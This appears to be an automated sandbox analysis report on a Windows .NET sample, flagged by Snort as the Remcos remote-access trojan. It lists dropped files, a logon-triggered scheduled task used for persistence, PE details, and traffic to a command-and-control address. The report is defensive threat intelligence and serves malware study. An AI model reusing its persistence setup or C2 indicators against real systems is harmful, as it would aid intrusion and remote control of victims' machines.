                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jdSldfVS.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                      Download File
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):962
                      Entropy (8bit):5.012309356796613
                      Encrypted:false
                      SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                      MD5:14B479958E659C5A4480548A393022AC
                      SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                      SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                      SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                      Malicious:false
                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.380192968514367
                      Encrypted:false
                      SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                      MD5:E3EC01FAB7E327602A9550342FA73464
                      SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                      SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                      SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qoqftdm.xej.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drg11gux.d1n.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eydoxywx.z2h.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqhikuo2.jtt.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt3rqlf2.rqb.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrrnp4pv.kln.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wg514shz.w0u.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdgz0ssf.ujp.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\tmpAF95.tmp

                      Download File
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1595
                      Entropy (8bit):5.09524540039865
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL/6xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTjOv
                      MD5:0454D4DBB6AA05FB8AA823FCDC9A6CC4
                      SHA1:34BE814378D1B6517891265C19EABEA09F9C65E4
                      SHA-256:130E0A8D3B3614B64F798CA2A91EE19C43B559820E145769E4F1E5E8BC8C2C0A
                      SHA-512:1EC2C48011DCAFC916594ECD992704D17C14BE51BFA9043B53BFAF8FA29160EBAF1F5A775163BE9DC06AA2304AC24A21C9D6304BD0FF09254C5B47111F92FE96
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                      C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1595
                      Entropy (8bit):5.09524540039865
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL/6xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTjOv
                      MD5:0454D4DBB6AA05FB8AA823FCDC9A6CC4
                      SHA1:34BE814378D1B6517891265C19EABEA09F9C65E4
                      SHA-256:130E0A8D3B3614B64F798CA2A91EE19C43B559820E145769E4F1E5E8BC8C2C0A
                      SHA-512:1EC2C48011DCAFC916594ECD992704D17C14BE51BFA9043B53BFAF8FA29160EBAF1F5A775163BE9DC06AA2304AC24A21C9D6304BD0FF09254C5B47111F92FE96
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                      C:\Users\user\AppData\Roaming\jdSldfVS.exe

                      Download File
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1011712
                      Entropy (8bit):7.795064861179612
                      Encrypted:false
                      SSDEEP:24576:OGIRtbsb56UfvzYc0UuGwsZIazwvZgiLF7i8eTqCs:mtgzZgscZfLFPr
                      MD5:EA0D00B95A91C801893B5526347170BB
                      SHA1:26D81494EB3C0FD67A6037DBD68E3BF8C7677D0D
                      SHA-256:6B585CAAF4299C406C45A3BEB76A8624D159404E1AAC48A292976119C6D9B72C
                      SHA-512:3B06324A0CB87E821DDC9980A23C68FD886F0A6EE639CE6E349ADF3CD9C17E07AA129218C237338317907EF291FF45485E7FA7EFADBC1C019B342D1B6D8731BB
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 32%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0.................. ........@.. ....................................@.................................d...O.......T............................................................................ ............... ..H............text........ ...................... ..`.rsrc...T...........................@..@.reloc...............h..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\jdSldfVS.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.795064861179612
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:HUED23EDE5UGRFQ.exe
                      File size:1'011'712 bytes
                      MD5:ea0d00b95a91c801893b5526347170bb
                      SHA1:26d81494eb3c0fd67a6037dbd68e3bf8c7677d0d
                      SHA256:6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c
                      SHA512:3b06324a0cb87e821ddc9980a23c68fd886f0a6ee639ce6e349adf3cd9c17e07aa129218c237338317907ef291ff45485e7fa7efadbc1c019b342d1b6d8731bb
                      SSDEEP:24576:OGIRtbsb56UfvzYc0UuGwsZIazwvZgiLF7i8eTqCs:mtgzZgscZfLFPr
                      TLSH:2F2501C2E5908682ED295F7810366C640377BE767CB5E28D9D4DB0B16BF37A70422D8B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.................. ........@.. ....................................@................................

                      File Icon

                      Icon Hash:1103212484000000

                      Static PE Info

                      General

                      Entrypoint:0x4deeb6
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6682DD86 [Mon Jul 1 16:47:02 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xdee640x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe00000x18a54.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xfa0000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000xdcebc0xdd000eeb374652e0640e661390343b550f12fFalse0.9691896740667421OpenPGP Public Key7.9794014993218445IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0xe00000x18a540x190002a958b86e9eac7dc11d5316f6c4eb566False0.18439453125data3.238054128897843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xfa0000xc0x800f353ee3eb698afe9dd364954c62fb864False0.01611328125data0.03037337037012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xe01d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 23622 x 23622 px/m0.3324468085106383
                      RT_ICON0xe06400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 23622 x 23622 px/m0.25117260787992496
                      RT_ICON0xe16e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 23622 x 23622 px/m0.2183609958506224
                      RT_ICON0xe3c900x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 23622 x 23622 px/m0.19550070854983467
                      RT_ICON0xe7eb80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 23622 x 23622 px/m0.1723796285342482
                      RT_GROUP_ICON0xf86e00x4cdata0.75
                      RT_GROUP_ICON0xf872c0x14data1.05
                      RT_VERSION0xf87400x312data0.43638676844783714

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      07/01/24-19:44:18.352759TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response29734971294.156.69.93192.168.2.6
                      07/01/24-19:41:59.286996TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497122973192.168.2.694.156.69.93

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 1, 2024 19:41:59.280551910 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:41:59.285382986 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:41:59.285702944 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:41:59.286995888 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:41:59.291820049 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:00.880173922 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:00.904875040 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:42:00.909691095 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:01.010234118 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:01.128710985 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:42:02.228837967 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:42:02.233824968 CEST8049715178.237.33.50192.168.2.6
                      Jul 1, 2024 19:42:02.233891010 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:42:02.235013008 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:42:02.240540028 CEST8049715178.237.33.50192.168.2.6
                      Jul 1, 2024 19:42:02.858299971 CEST8049715178.237.33.50192.168.2.6
                      Jul 1, 2024 19:42:02.858437061 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:42:02.871731043 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:42:02.876640081 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:03.858366013 CEST8049715178.237.33.50192.168.2.6
                      Jul 1, 2024 19:42:03.858416080 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:42:17.700526953 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:17.702244997 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:42:17.707052946 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:47.754066944 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:42:47.755279064 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:42:47.760703087 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:43:17.767117023 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:43:17.769068003 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:43:17.775547028 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:43:48.222774029 CEST29734971294.156.69.93192.168.2.6
